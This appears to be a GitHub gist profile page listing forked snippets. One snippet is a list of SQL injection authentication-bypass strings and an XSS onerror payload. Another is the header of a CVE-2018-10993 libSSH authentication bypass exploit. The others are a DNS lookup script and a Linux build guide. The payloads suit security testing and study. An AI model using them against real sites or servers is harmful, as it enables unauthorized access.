Skip to content

Instantly share code, notes, and snippets.

View jam620's full-sized avatar

jam620

18 followers · 59 following
View GitHub Profile
@jam620
jam620 / sqlinjection_xss.txt
Created April 10, 2021 23:50 — forked from dhavz/sqlinjection_xss.txt
flag XSS <img src onerror=alert("")>
'or''='
' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
@jam620
jam620 / get_dns_records.py
Created February 4, 2021 17:43 — forked from akshaybabloo/get_dns_records.py
Printing all DNS records using DNSPython in Python 3
#!/usr/bin/env python
# -*- coding utf-8 -*-
#
# Copyright 2016 Akshay Raj Gollahalli
import dns.resolver
def get_records(domain):
"""
@jam620
jam620 / Cómo construir tu propio sistema linux.md
Created July 20, 2020 17:42 — forked from s4vitar/Cómo construir tu propio sistema linux.md
@jam620
jam620 / cve-2018-10993.py
Created August 1, 2019 04:01 — forked from mgeeky/cve-2018-10993.py
CVE-2018-10993 libSSH authentication bypass exploit
#!/usr/bin/python3
#
# CVE-2018-10993 libSSH authentication bypass exploit
#
# The libSSH library has flawed authentication/connection state-machine.
# Upon receiving from connecting client the MSG_USERAUTH_SUCCESS Message
# (as described in RFC4252, sec. 5.1.) which is an authentication response message
# that should be returned by the server itself (not accepted from client)
# the libSSH switches to successful post-authentication state. In such state,